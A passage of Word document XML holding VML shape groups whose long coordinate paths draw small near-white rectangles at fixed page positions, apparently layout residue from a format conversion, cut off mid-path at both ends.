,8111,2095,8112,2095,8113,2095,8114,2095,8115,2095,8116,2095,8117,2095,8118,2095,8119,2095,8121,2095,8122,2095,8123,2095,8125,2095,8126,2095,8128,2095,8129,2095,8131,2095,8132,2095,8134,2095,8136,2095,8138,2095,8140,2095,8142,2095,8144,2095,8146,2095,8148,2095,8150,2095,8152,2095,8155,2095,8157,2095,8159,2095,8162,2095,8165,2095,8167,2095,8170,2095,8173,2095,8176,2095,8179,2095,8182,2095,8185,2095,8188,2095,8191,2095,8194,2095,8198,2095,8201,2095,8205,2095,8208,2095,8212,2095,8216,2095,8220,2095,8224,2095,8228,2095,8232,2095,8236,2095,8241,2095,8245,2095,8249,2095,8254,2095,8259,2095,8264,2095,8268,2095,8273,2095,8278,2095,8284,2095,8289,2095,8294,2095,8300,2095,8305,2095,8311,2095,8317,2095,8322,2095,8328,2095,8334,2095,8341,2095,8347,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2095,8353,2094,8353,2094,8353,2094,8353,2094,8353,2094,8353,2094,8353,2094,8353,2094,8353,2093,8353,2093,8353,2093,8353,2093,8353,2093,8353,2092,8353,2092,8353,2092,8353,2092,8353,2091,8353,2091,8353,2091,8353,2090,8353,2090,8353,2090,8353,2089,8353,2089,8353,2089,8353,2088,8353,2088,8353,2087,8353,2087,8353,2086,8353,2086,8353,2085,8353,2084,8353,2084,8353,2083,8353,2083,8353,2082,8353,2081,8353,2080,8353,2080,8353,2079,8353,2078,8353,2077,8353,2076,8353,2075,8353,2075,8353,2074,8353,2073,8353,2072,8353,2071,8353,2070,8353,2068,8353,2067,8353,2066,8353,2065,8353,2064,8353,2063,8353,2061,8353,2060,8353,2059,8353,2057,8353,2056,8353,2054,8353,2053,8353,2051,8353,2050,8353,2048,8353,2047,8353,2045,8353,2043,8353,2041,8353,2040,8353,2038,8353,2036,8353,2034,8353,2032,8353,2030,8353,2028,8353,2026,8353,2024,8353,2022,8353,2019,8353,2017,8353,2015,8353,2013,8353,2010,8353,2008,8353,2005,8353,2003,8353,2000,8353,1998,8353,1995,8353,1992,8353,1990,8353,1987,8353,1984,8353,1981,8353,1978,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8353,1975,8352,1975,8352,1975,8352,1975,8352,1975,8352,1975,8352,1975,8351,1975,8351,1975,8351,1975,8351,1975,8350,1975,8350,1975,8350,1975,8349,1975,8349,1975,8348,1975,8348,1975,8347,1975,8347,1975,8346,1975,8346,1975,8345,1975,8344,1975,8344,1975,8343,1975,8342,1975,8341,1975,8340,1975,8339,1975,8338,1975,8337,1975,8336,1975,8335,1975,8334,1975,8333,1975,8332,1975,8331,1975,8329,1975,8328,1975,8327,1975,8325,1975,8324,1975,8322,1975,8321,1975,8319,1975,8317,1975,8315,1975,8314,1975,8312,1975,8310,1975,8308,1975,8306,1975,8303,1975,8301,1975,8299,1975,8297,1975,8294,1975,8292,1975,8289,1975,8287,1975,8284,1975,8281,1975,8279,1975,8276,1975,8273,1975,8270,1975,8267,1975,8263,1975,8260,1975,8257,1975,8254,1975,8250,1975,8246,1975,8243,1975,8239,1975,8235,1975,8231,1975,8227,1975,8223,1975,8219,1975,8215,1975,8211,1975,8206,1975,8202,1975,8197,1975,8193,1975,8188,1975,8183,1975,8178,1975,8173,1975,8168,1975,8162,1975,8157,1975,8152,1975,8146,1975,8141,1975,8135,1975,8129,1975,8123,1975,8117,1975,8111,1975,8104,1975,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:223.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4470,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:4470;top:8070;width:130;height:270" coordorigin="4470,8070" coordsize="130,270" path="m4496,8098l4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4496,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4497,8098,4498,8098,4498,8098,4498,8098,4498,8098,4498,8098,4498,8098,4499,8098,4499,8098,4499,8098,4499,8098,4500,8098,4500,8098,4500,8098,4500,8098,4501,8098,4501,8098,4502,8098,4502,8098,4502,8098,4503,8098,4503,8098,4504,8098,4504,8098,4505,8098,4505,8098,4506,8098,4506,8098,4507,8098,4507,8098,4508,8098,4509,8098,4509,8098,4510,8098,4511,8098,4512,8098,4512,8098,4513,8098,4514,8098,4515,8098,4516,8098,4517,8098,4518,8098,4519,8098,4520,8098,4521,8098,4522,8098,4523,8098,4524,8098,4525,8098,4526,8098,4528,8098,4529,8098,4530,8098,4531,8098,4533,8098,4534,8098,4536,8098,4537,8098,4538,8098,4540,8098,4542,8098,4543,8098,4545,8098,4546,8098,4548,8098,4550,8098,4552,8098,4554,8098,4555,8098,4557,8098,4559,8098,4561,8098,4563,8098,4565,8098,4568,8098,4570,8098,4572,8098,4574,8098,4576,8098,4579,8098,4581,8098,4584,8098,4586,8098,4589,8098,4591,8098,4594,8098,4596,8098,4599,8098,4602,8098,4605,8098,4607,8098,4610,8098,4613,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8098,4616,8099,4616,8099,4616,8099,4616,8099,4616,8099,4616,8099,4616,8099,4616,8100,4616,8100,4616,8100,4616,8100,4616,8101,4616,8101,4616,8101,4616,8102,4616,8102,4616,8103,4616,8103,4616,8104,4616,8104,4616,8105,4616,8105,4616,8106,4616,8106,4616,8107,4616,8108,4616,8109,4616,8109,4616,8110,4616,8111,4616,8112,4616,8113,4616,8114,4616,8115,4616,8116,4616,8117,4616,8118,4616,8119,4616,8121,4616,8122,4616,8123,4616,8125,4616,8126,4616,8128,4616,8129,4616,8131,4616,8132,4616,8134,4616,8136,4616,8138,4616,8140,4616,8142,4616,8144,4616,8146,4616,8148,4616,8150,4616,8152,4616,8155,4616,8157,4616,8159,4616,8162,4616,8165,4616,8167,4616,8170,4616,8173,4616,8176,4616,8179,4616,8182,4616,8185,4616,8188,4616,8191,4616,8194,4616,8198,4616,8201,4616,8205,4616,8208,4616,8212,4616,8216,4616,8220,4616,8224,4616,8228,4616,8232,4616,8236,4616,8241,4616,8245,4616,8249,4616,8254,4616,8259,4616,8264,4616,8268,4616,8273,4616,8278,4616,8284,4616,8289,4616,8294,4616,8300,4616,8305,4616,8311,4616,8317,4616,8322,4616,8328,4616,8334,4616,8341,4616,8347,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4616,8353,4615,8353,4615,8353,4615,8353,4615,8353,4615,8353,4615,8353,4615,8353,4614,8353,4614,8353,4614,8353,4614,8353,4614,8353,4613,8353,4613,8353,4613,8353,4612,8353,4612,8353,4612,8353,4611,8353,4611,8353,4611,8353,4610,8353,4610,8353,4609,8353,4609,8353,4608,8353,4608,8353,4607,8353,4607,8353,4606,8353,4606,8353,4605,8353,4604,8353,4604,8353,4603,8353,4602,8353,4602,8353,4601,8353,4600,8353,4599,8353,4599,8353,4598,8353,4597,8353,4596,8353,4595,8353,4594,8353,4593,8353,4592,8353,4591,8353,4590,8353,4589,8353,4587,8353,4586,8353,4585,8353,4584,8353,4583,8353,4581,8353,4580,8353,4578,8353,4577,8353,4576,8353,4574,8353,4573,8353,4571,8353,4569,8353,4568,8353,4566,8353,4564,8353,4563,8353,4561,8353,4559,8353,4557,8353,4555,8353,4553,8353,4551,8353,4549,8353,4547,8353,4545,8353,4543,8353,4541,8353,4538,8353,4536,8353,4534,8353,4531,8353,4529,8353,4527,8353,4524,8353,4521,8353,4519,8353,4516,8353,4514,8353,4511,8353,4508,8353,4505,8353,4502,8353,4499,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8353,4496,8352,4496,8352,4496,8352,4496,8352,4496,8352,4496,8352,4496,8351,4496,8351,4496,8351,4496,8351,4496,8350,4496,8350,4496,8350,4496,8349,4496,8349,4496,8348,4496,8348,4496,8347,4496,8347,4496,8346,4496,8346,4496,8345,4496,8344,4496,8344,4496,8343,4496,8342,4496,8341,4496,8340,4496,8339,4496,8338,4496,8337,4496,8336,4496,8335,4496,8334,4496,8333,4496,8332,4496,8331,4496,8329,4496,8328,4496,8327,4496,8325,4496,8324,4496,8322,4496,8321,4496,8319,4496,8317,4496,8315,4496,8314,4496,8312,4496,8310,4496,8308,4496,8306,4496,8303,4496,8301,4496,8299,4496,8297,4496,8294,4496,8292,4496,8289,4496,8287,4496,8284,4496,8281,4496,8279,4496,8276,4496,8273,4496,8270,4496,8267,4496,8263,4496,8260,4496,8257,4496,8254,4496,8250,4496,8246,4496,8243,4496,8239,4496,8235,4496,8231,4496,8227,4496,8223,4496,8219,4496,8215,4496,8211,4496,8206,4496,8202,4496,8197,4496,8193,4496,8188,4496,8183,4496,8178,4496,8173,4496,8168,4496,8162,4496,8157,4496,8152,4496,8146,4496,8141,4496,8135,4496,8129,4496,8123,4496,8117,4496,8111,4496,8104,4496,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:265.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5310,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:5310;top:8070;width:130;height:270" coordorigin="5310,8070" coordsize="130,270" path="m5337,8098l5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5337,8098,5338,8098,5338,8098,5338,8098,5338,8098,5338,8098,5338,8098,5338,8098,5339,8098,5339,8098,5339,8098,5339,8098,5339,8098,5340,8098,5340,8098,5340,8098,5341,8098,5341,8098,5341,8098,5342,8098,5342,8098,5342,8098,5343,8098,5343,8098,5344,8098,5344,8098,5345,8098,5345,8098,5346,8098,5346,8098,5347,8098,5347,8098,5348,8098,5349,8098,5349,8098,5350,8098,5351,8098,5351,8098,5352,8098,5353,8098,5354,8098,5355,8098,5355,8098,5356,8098,5357,8098,5358,8098,5359,8098,5360,8098,5361,8098,5362,8098,5363,8098,5364,8098,5366,8098,5367,8098,5368,8098,5369,8098,5370,8098,5372,8098,5373,8098,5375,8098,5376,8098,5377,8098,5379,8098,5380,8098,5382,8098,5384,8098,5385,8098,5387,8098,5389,8098,5390,8098,5392,8098,5394,8098,5396,8098,5398,8098,5400,8098,5402,8098,5404,8098,5406,8098,5408,8098,5410,8098,5412,8098,5415,8098,5417,8098,5419,8098,5422,8098,5424,8098,5426,8098,5429,8098,5432,8098,5434,8098,5437,8098,5439,8098,5442,8098,5445,8098,5448,8098,5451,8098,5454,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8098,5457,8099,5457,8099,5457,8099,5457,8099,5457,8099,5457,8099,5457,8099,5457,8100,5457,8100,5457,8100,5457,8100,5457,8101,5457,8101,5457,8101,5457,8102,5457,8102,5457,8103,5457,8103,5457,8104,5457,8104,5457,8105,5457,8105,5457,8106,5457,8106,5457,8107,5457,8108,5457,8109,5457,8109,5457,8110,5457,8111,5457,8112,5457,8113,5457,8114,5457,8115,5457,8116,5457,8117,5457,8118,5457,8119,5457,8121,5457,8122,5457,8123,5457,8125,5457,8126,5457,8128,5457,8129,5457,8131,5457,8132,5457,8134,5457,8136,5457,8138,5457,8140,5457,8142,5457,8144,5457,8146,5457,8148,5457,8150,5457,8152,5457,8155,5457,8157,5457,8159,5457,8162,5457,8165,5457,8167,5457,8170,5457,8173,5457,8176,5457,8179,5457,8182,5457,8185,5457,8188,5457,8191,5457,8194,5457,8198,5457,8201,5457,8205,5457,8208,5457,8212,5457,8216,5457,8220,5457,8224,5457,8228,5457,8232,5457,8236,5457,8241,5457,8245,5457,8249,5457,8254,5457,8259,5457,8264,5457,8268,5457,8273,5457,8278,5457,8284,5457,8289,5457,8294,5457,8300,5457,8305,5457,8311,5457,8317,5457,8322,5457,8328,5457,8334,5457,8341,5457,8347,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5457,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5456,8353,5455,8353,5455,8353,5455,8353,5455,8353,5455,8353,5455,8353,5454,8353,5454,8353,5454,8353,5454,8353,5453,8353,5453,8353,5453,8353,5453,8353,5452,8353,5452,8353,5451,8353,5451,8353,5451,8353,5450,8353,5450,8353,5449,8353,5449,8353,5448,8353,5448,8353,5447,8353,5447,8353,5446,8353,5446,8353,5445,8353,5444,8353,5444,8353,5443,8353,5442,8353,5441,8353,5441,8353,5440,8353,5439,8353,5438,8353,5437,8353,5436,8353,5435,8353,5434,8353,5433,8353,5432,8353,5431,8353,5430,8353,5429,8353,5428,8353,5427,8353,5425,8353,5424,8353,5423,8353,5422,8353,5420,8353,5419,8353,5417,8353,5416,8353,5415,8353,5413,8353,5411,8353,5410,8353,5408,8353,5407,8353,5405,8353,5403,8353,5401,8353,5399,8353,5398,8353,5396,8353,5394,8353,5392,8353,5390,8353,5388,8353,5386,8353,5383,8353,5381,8353,5379,8353,5377,8353,5374,8353,5372,8353,5369,8353,5367,8353,5364,8353,5362,8353,5359,8353,5357,8353,5354,8353,5351,8353,5348,8353,5346,8353,5343,8353,5340,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8353,5337,8352,5337,8352,5337,8352,5337,8352,5337,8352,5337,8352,5337,8351,5337,8351,5337,8351,5337,8351,5337,8350,5337,8350,5337,8350,5337,8349,5337,8349,5337,8348,5337,8348,5337,8347,5337,8347,5337,8346,5337,8346,5337,8345,5337,8344,5337,8344,5337,8343,5337,8342,5337,8341,5337,8340,5337,8339,5337,8338,5337,8337,5337,8336,5337,8335,5337,8334,5337,8333,5337,8332,5337,8331,5337,8329,5337,8328,5337,8327,5337,8325,5337,8324,5337,8322,5337,8321,5337,8319,5337,8317,5337,8315,5337,8314,5337,8312,5337,8310,5337,8308,5337,8306,5337,8303,5337,8301,5337,8299,5337,8297,5337,8294,5337,8292,5337,8289,5337,8287,5337,8284,5337,8281,5337,8279,5337,8276,5337,8273,5337,8270,5337,8267,5337,8263,5337,8260,5337,8257,5337,8254,5337,8250,5337,8246,5337,8243,5337,8239,5337,8235,5337,8231,5337,8227,5337,8223,5337,8219,5337,8215,5337,8211,5337,8206,5337,8202,5337,8197,5337,8193,5337,8188,5337,8183,5337,8178,5337,8173,5337,8168,5337,8162,5337,8157,5337,8152,5337,8146,5337,8141,5337,8135,5337,8129,5337,8123,5337,8117,5337,8111,5337,8104,5337,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:361.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7230,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:7230;top:8070;width:130;height:270" coordorigin="7230,8070" coordsize="130,270" path="m7258,8098l7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7258,8098,7259,8098,7259,8098,7259,8098,7259,8098,7259,8098,7259,8098,7259,8098,7260,8098,7260,8098,7260,8098,7260,8098,7260,8098,7261,8098,7261,8098,7261,8098,7262,8098,7262,8098,7262,8098,7263,8098,7263,8098,7263,8098,7264,8098,7264,8098,7265,8098,7265,8098,7266,8098,7266,8098,7267,8098,7267,8098,7268,8098,7268,8098,7269,8098,7270,8098,7270,8098,7271,8098,7272,8098,7272,8098,7273,8098,7274,8098,7275,8098,7275,8098,7276,8098,7277,8098,7278,8098,7279,8098,7280,8098,7281,8098,7282,8098,7283,8098,7284,8098,7285,8098,7287,8098,7288,8098,7289,8098,7290,8098,7291,8098,7293,8098,7294,8098,7296,8098,7297,8098,7298,8098,7300,8098,7301,8098,7303,8098,7305,8098,7306,8098,7308,8098,7310,8098,7311,8098,7313,8098,7315,8098,7317,8098,7319,8098,7321,8098,7323,8098,7325,8098,7327,8098,7329,8098,7331,8098,7333,8098,7336,8098,7338,8098,7340,8098,7343,8098,7345,8098,7347,8098,7350,8098,7352,8098,7355,8098,7358,8098,7360,8098,7363,8098,7366,8098,7369,8098,7372,8098,7375,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8098,7378,8099,7378,8099,7378,8099,7378,8099,7378,8099,7378,8099,7378,8099,7378,8100,7378,8100,7378,8100,7378,8100,7378,8101,7378,8101,7378,8101,7378,8102,7378,8102,7378,8103,7378,8103,7378,8104,7378,8104,7378,8105,7378,8105,7378,8106,7378,8106,7378,8107,7378,8108,7378,8109,7378,8109,7378,8110,7378,8111,7378,8112,7378,8113,7378,8114,7378,8115,7378,8116,7378,8117,7378,8118,7378,8119,7378,8121,7378,8122,7378,8123,7378,8125,7378,8126,7378,8128,7378,8129,7378,8131,7378,8132,7378,8134,7378,8136,7378,8138,7378,8140,7378,8142,7378,8144,7378,8146,7378,8148,7378,8150,7378,8152,7378,8155,7378,8157,7378,8159,7378,8162,7378,8165,7378,8167,7378,8170,7378,8173,7378,8176,7378,8179,7378,8182,7378,8185,7378,8188,7378,8191,7378,8194,7378,8198,7378,8201,7378,8205,7378,8208,7378,8212,7378,8216,7378,8220,7378,8224,7378,8228,7378,8232,7378,8236,7378,8241,7378,8245,7378,8249,7378,8254,7378,8259,7378,8264,7378,8268,7378,8273,7378,8278,7378,8284,7378,8289,7378,8294,7378,8300,7378,8305,7378,8311,7378,8317,7378,8322,7378,8328,7378,8334,7378,8341,7378,8347,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7378,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7377,8353,7376,8353,7376,8353,7376,8353,7376,8353,7376,8353,7376,8353,7375,8353,7375,8353,7375,8353,7375,8353,7374,8353,7374,8353,7374,8353,7373,8353,7373,8353,7373,8353,7372,8353,7372,8353,7372,8353,7371,8353,7371,8353,7370,8353,7370,8353,7369,8353,7369,8353,7368,8353,7368,8353,7367,8353,7366,8353,7366,8353,7365,8353,7365,8353,7364,8353,7363,8353,7362,8353,7362,8353,7361,8353,7360,8353,7359,8353,7358,8353,7357,8353,7356,8353,7355,8353,7354,8353,7353,8353,7352,8353,7351,8353,7350,8353,7349,8353,7348,8353,7346,8353,7345,8353,7344,8353,7343,8353,7341,8353,7340,8353,7338,8353,7337,8353,7335,8353,7334,8353,7332,8353,7331,8353,7329,8353,7327,8353,7326,8353,7324,8353,7322,8353,7320,8353,7319,8353,7317,8353,7315,8353,7313,8353,7311,8353,7309,8353,7306,8353,7304,8353,7302,8353,7300,8353,7298,8353,7295,8353,7293,8353,7290,8353,7288,8353,7285,8353,7283,8353,7280,8353,7278,8353,7275,8353,7272,8353,7269,8353,7267,8353,7264,8353,7261,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8353,7258,8352,7258,8352,7258,8352,7258,8352,7258,8352,7258,8352,7258,8351,7258,8351,7258,8351,7258,8351,7258,8350,7258,8350,7258,8350,7258,8349,7258,8349,7258,8348,7258,8348,7258,8347,7258,8347,7258,8346,7258,8346,7258,8345,7258,8344,7258,8344,7258,8343,7258,8342,7258,8341,7258,8340,7258,8339,7258,8338,7258,8337,7258,8336,7258,8335,7258,8334,7258,8333,7258,8332,7258,8331,7258,8329,7258,8328,7258,8327,7258,8325,7258,8324,7258,8322,7258,8321,7258,8319,7258,8317,7258,8315,7258,8314,7258,8312,7258,8310,7258,8308,7258,8306,7258,8303,7258,8301,7258,8299,7258,8297,7258,8294,7258,8292,7258,8289,7258,8287,7258,8284,7258,8281,7258,8279,7258,8276,7258,8273,7258,8270,7258,8267,7258,8263,7258,8260,7258,8257,7258,8254,7258,8250,7258,8246,7258,8243,7258,8239,7258,8235,7258,8231,7258,8227,7258,8223,7258,8219,7258,8215,7258,8211,7258,8206,7258,8202,7258,8197,7258,8193,7258,8188,7258,8183,7258,8178,7258,8173,7258,8168,7258,8162,7258,8157,7258,8152,7258,8146,7258,8141,7258,8135,7258,8129,7258,8123,7258,8117,7258,8111,7258,8104,7258,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:421.500pt;margin-top:403.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8430,8070" coordsize="130,270">
        <v:shape style="position:absolute;left:8430;top:8070;width:130;height:270" coordorigin="8430,8070" coordsize="130,270" path="m8458,8098l8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8458,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8459,8098,8460,8098,8460,8098,8460,8098,8460,8098,8460,8098,8460,8098,8461,8098,8461,8098,8461,8098,8461,8098,8462,8098,8462,8098,8462,8098,8462,8098,8463,8098,8463,8098,8464,8098,8464,8098,8464,8098,8465,8098,8465,8098,8466,8098,8466,8098,8467,8098,8467,8098,8468,8098,8468,8098,8469,8098,8469,8098,8470,8098,8471,8098,8471,8098,8472,8098,8473,8098,8474,8098,8474,8098,8475,8098,8476,8098,8477,8098,8478,8098,8479,8098,8480,8098,8481,8098,8482,8098,8483,8098,8484,8098,8485,8098,8486,8098,8487,8098,8488,8098,8490,8098,8491,8098,8492,8098,8493,8098,8495,8098,8496,8098,8498,8098,8499,8098,8500,8098,8502,8098,8504,8098,8505,8098,8507,8098,8508,8098,8510,8098,8512,8098,8514,8098,8516,8098,8517,8098,8519,8098,8521,8098,8523,8098,8525,8098,8527,8098,8530,8098,8532,8098,8534,8098,8536,8098,8538,8098,8541,8098,8543,8098,8546,8098,8548,8098,8551,8098,8553,8098,8556,8098,8558,8098,8561,8098,8564,8098,8567,8098,8569,8098,8572,8098,8575,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8098,8578,8099,8578,8099,8578,8099,8578,8099,8578,8099,8578,8099,8578,8099,8578,8100,8578,8100,8578,8100,8578,8100,8578,8101,8578,8101,8578,8101,8578,8102,8578,8102,8578,8103,8578,8103,8578,8104,8578,8104,8578,8105,8578,8105,8578,8106,8578,8106,8578,8107,8578,8108,8578,8109,8578,8109,8578,8110,8578,8111,8578,8112,8578,8113,8578,8114,8578,8115,8578,8116,8578,8117,8578,8118,8578,8119,8578,8121,8578,8122,8578,8123,8578,8125,8578,8126,8578,8128,8578,8129,8578,8131,8578,8132,8578,8134,8578,8136,8578,8138,8578,8140,8578,8142,8578,8144,8578,8146,8578,8148,8578,8150,8578,8152,8578,8155,8578,8157,8578,8159,8578,8162,8578,8165,8578,8167,8578,8170,8578,8173,8578,8176,8578,8179,8578,8182,8578,8185,8578,8188,8578,8191,8578,8194,8578,8198,8578,8201,8578,8205,8578,8208,8578,8212,8578,8216,8578,8220,8578,8224,8578,8228,8578,8232,8578,8236,8578,8241,8578,8245,8578,8249,8578,8254,8578,8259,8578,8264,8578,8268,8578,8273,8578,8278,8578,8284,8578,8289,8578,8294,8578,8300,8578,8305,8578,8311,8578,8317,8578,8322,8578,8328,8578,8334,8578,8341,8578,8347,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8578,8353,8577,8353,8577,8353,8577,8353,8577,8353,8577,8353,8577,8353,8577,8353,8576,8353,8576,8353,8576,8353,8576,8353,8576,8353,8575,8353,8575,8353,8575,8353,8574,8353,8574,8353,8574,8353,8573,8353,8573,8353,8573,8353,8572,8353,8572,8353,8571,8353,8571,8353,8570,8353,8570,8353,8569,8353,8569,8353,8568,8353,8568,8353,8567,8353,8566,8353,8566,8353,8565,8353,8564,8353,8564,8353,8563,8353,8562,8353,8561,8353,8561,8353,8560,8353,8559,8353,8558,8353,8557,8353,8556,8353,8555,8353,8554,8353,8553,8353,8552,8353,8551,8353,8549,8353,8548,8353,8547,8353,8546,8353,8545,8353,8543,8353,8542,8353,8540,8353,8539,8353,8538,8353,8536,8353,8535,8353,8533,8353,8531,8353,8530,8353,8528,8353,8526,8353,8525,8353,8523,8353,8521,8353,8519,8353,8517,8353,8515,8353,8513,8353,8511,8353,8509,8353,8507,8353,8505,8353,8503,8353,8500,8353,8498,8353,8496,8353,8493,8353,8491,8353,8489,8353,8486,8353,8483,8353,8481,8353,8478,8353,8476,8353,8473,8353,8470,8353,8467,8353,8464,8353,8461,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8353,8458,8352,8458,8352,8458,8352,8458,8352,8458,8352,8458,8352,8458,8351,8458,8351,8458,8351,8458,8351,8458,8350,8458,8350,8458,8350,8458,8349,8458,8349,8458,8348,8458,8348,8458,8347,8458,8347,8458,8346,8458,8346,8458,8345,8458,8344,8458,8344,8458,8343,8458,8342,8458,8341,8458,8340,8458,8339,8458,8338,8458,8337,8458,8336,8458,8335,8458,8334,8458,8333,8458,8332,8458,8331,8458,8329,8458,8328,8458,8327,8458,8325,8458,8324,8458,8322,8458,8321,8458,8319,8458,8317,8458,8315,8458,8314,8458,8312,8458,8310,8458,8308,8458,8306,8458,8303,8458,8301,8458,8299,8458,8297,8458,8294,8458,8292,8458,8289,8458,8287,8458,8284,8458,8281,8458,8279,8458,8276,8458,8273,8458,8270,8458,8267,8458,8263,8458,8260,8458,8257,8458,8254,8458,8250,8458,8246,8458,8243,8458,8239,8458,8235,8458,8231,8458,8227,8458,8223,8458,8219,8458,8215,8458,8211,8458,8206,8458,8202,8458,8197,8458,8193,8458,8188,8458,8183,8458,8178,8458,8173,8458,8168,8458,8162,8458,8157,8458,8152,8458,8146,8458,8141,8458,8135,8458,8129,8458,8123,8458,8117,8458,8111,8458,8104,8458,8098e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:422.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,8450" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:8450;width:130;height:270" coordorigin="1950,8450" coordsize="130,270" 